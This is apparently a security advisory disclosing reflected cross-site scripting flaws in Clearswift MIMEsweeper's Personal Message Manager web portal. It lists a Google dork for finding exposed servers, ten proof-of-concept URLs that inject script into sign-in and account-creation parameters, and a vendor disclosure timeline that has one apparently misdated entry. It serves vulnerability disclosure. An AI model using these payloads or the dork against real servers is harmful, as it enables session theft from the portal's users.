Application: MIMEsweeper for SMTP 5.5 (5.2, 5.3, 5.4 and probably earlier versions) Personal Message Manager (PMM)
Vendor: Clearswift Ltd
Vendor URL: http://www.clearswift.com/
Category: Reflective XSS
Google dork: inurl:/MSWPMM/
Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com]

[Vulnerability Reproduction]
1. https://[HOST]/MSWPMM/Common/Reminder.aspx?email=test<script>alert(document.cookie)</script>
2. http://[HOST]/MSWPMM/Common/NewAccount.aspx?email=<script>alert("xss")</script>
3. http://[HOST]/MSWPMM/Common/NewAccount.aspx?ddlCulture=<script>alert("xss")</script>
4. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCreateAccount=<script>alert("xss")</script>
5. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCancel=<script>alert("xss")</script>
6. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbEmailAddress=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
7. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbPassword=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
8. http://[HOST]/MSWPMM/Common/SignIn.aspx?cbAutoSignIn="<script>alert("xss")</script>
9. http://[HOST]/MSWPMM/Common/SignIn.aspx?btnSignIn=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
10. http://[HOST]/MSWPMM/Common/SignIn.aspx?reason=<script>alert("xss")</script>

[Time-line]
17/07/2009 - Initial discovery
13/01/2012 - Notified vendor
13/01/2012 - Vendor responded
16/01/2012 - Vendor requested more information
16/01/2012 - Vendor supplied demo version of latest release (v5.5) to evaluate
16/01/2012 - Informed vendor for evaluation progress, v5.5.0 is vulnerable too
17/01/2012 - Telephone conversation with vendor in regards the findings
17/01/2012 - Assigned vulnerability reference MSW-1459
25/01/2012 - Requested status update
25/01/2012 - Vendor replied "There is no update on MSW-1459."
16/02/2012 - Requested status update
26/02/2012 - Vendor replied "There is no update on MSW-1459."
23/03/2012 - Requested status update
23/03/2012 - Vendor replied "There is no update on MSW-1459."
09/05/2012 - Requested status update and gave a notice for public disclosure
11/05/2012 - Vendor replied "There is no update on MSW-1459."
18/05/2012 - Vendor replied that the issue has been escalated to their Engineering Response Team
07/06/2012 - Vendor informed us that the issues will be addressed in the next scheduled release
07/06/2012 - Requested due to date for next release
12/06/2012 - Vendor informed us that the next patch release is being targeted for Q4 2012
13/06/2012 - We suggested to postpone the disclosure after the patch be public
06/12/2012 - Requested status update
06/12/2012 - Vendor sent details for patch
28/01/2013 - Patch is applicable for 5.5.1
09/02/2012 - We requested for demo license to verify fix
15/02/2013 - Vendor could not produce demo license for us to verify the fix
15/02/2013 - Vendor closes incident ticket
18/02/2013 - Public disclosure date